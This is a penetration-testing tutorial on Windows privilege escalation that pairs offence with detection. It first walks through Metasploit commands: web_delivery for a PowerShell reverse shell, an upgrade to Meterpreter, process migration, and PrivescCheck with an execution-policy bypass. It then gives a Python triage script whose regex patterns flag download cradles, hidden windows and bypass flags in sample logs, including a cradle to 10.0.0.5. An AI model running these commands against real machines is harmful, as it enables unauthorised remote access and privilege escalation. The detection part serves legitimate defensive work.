Identifying Windows Privilege Escalation
A tool we can use for this is the PrivescCheck script. You can get it here
Using the Metasploit web_delivery module, we generate a PowerShell one-liner to run on the target machine; this gives us a command shell session that can later be upgraded to a Meterpreter session. In msfconsole:
use exploit/multi/script/web_delivery
set target PSH\ (Binary)
set payload windows/shell/reverse_tcp
set PSH-EncodedCommand false
set LHOST
exploit
Copy the generated PowerShell command and run it from cmd on the target; a command shell session should open when it runs.
To upgrade that session to a Meterpreter shell:
use post/multi/manage/shell_to_meterpreter
set SESSION
set LHOST
set WIN_TRANSFER VBS
exploit
Migrate into a 64-bit process (explorer.exe is 64-bit on 64-bit Windows). pgrep prints its PID, which is what migrate takes (777 is the PID in this example):
pgrep explorer.exe
migrate 777
To identify privilege escalation paths with the PrivescCheck PowerShell script, run it from the shell you obtained (-ep bypass skips the execution policy; the script is dot-sourced and then Invoke-PrivescCheck runs the checks):
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
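From the defender's side, every step above leaves a PowerShell command line in process-creation telemetry (Windows Event ID 4688 with command-line logging enabled, or Sysmon Event ID 1). The following is an added example, not code from the page or from PrivescCheck or Metasploit: a small triage script that flags command lines showing the patterns used here (download cradle, hidden window, execution policy bypass, dot-sourced PrivescCheck). The records, PIDs and the 10.0.0.5 address are constructed sample data.

```python
"""Flag PowerShell process-creation records matching the patterns used in
the procedure above. Sample records are constructed, not real telemetry."""
import re

# Indicator label -> regex (matched case-insensitively against the command line).
INDICATORS = [
    ("exec_policy_bypass", r"-(?:ep|executionpolicy)\s+bypass"),
    ("hidden_window",      r"-w(?:indowstyle)?\s+hidden"),
    ("no_profile",         r"-no(?:p|profile)\b"),
    ("download_cradle",    r"net\.webclient|downloadstring|invoke-webrequest|\biwr\b"),
    ("iex",                r"\biex\b|invoke-expression"),
    ("encoded_command",    r"-e(?:nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}"),
    ("privesccheck",       r"privesccheck"),
]


def score_command_line(cmdline):
    """Return the labels of all indicators present in one command line."""
    lowered = cmdline.lower()
    return [label for label, pattern in INDICATORS if re.search(pattern, lowered)]


def triage(records, threshold=2):
    """records: iterable of (pid, parent_image, command_line) tuples.
    Alert on PowerShell launches with >= threshold indicators, or any
    mention of PrivescCheck regardless of score."""
    alerts = []
    for pid, parent, cmd in records:
        if "powershell" not in cmd.lower():
            continue
        hits = score_command_line(cmd)
        if len(hits) >= threshold or "privesccheck" in hits:
            alerts.append({"pid": pid, "parent": parent, "indicators": hits})
    return alerts


# Constructed records shaped like 4688 / Sysmon Event 1 fields (PID, parent, command line).
SAMPLE_RECORDS = [
    (4120, "C:\\Windows\\System32\\cmd.exe",
     "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient)"
     ".downloadstring('http://10.0.0.5:8080/x'))\""),   # web_delivery-style cradle
    (4188, "C:\\Windows\\System32\\cmd.exe",
     "powershell -ep bypass -c \". .\\PrivescCheck.ps1; Invoke-PrivescCheck\""),
    (5001, "C:\\Windows\\explorer.exe",
     "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"),  # benign admin script
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_RECORDS):
        print(alert)
```

Only the first two records alert; the third carries a single weak indicator (-NoProfile) and is left alone, which is the kind of threshold you tune against your own baseline of scheduled scripts.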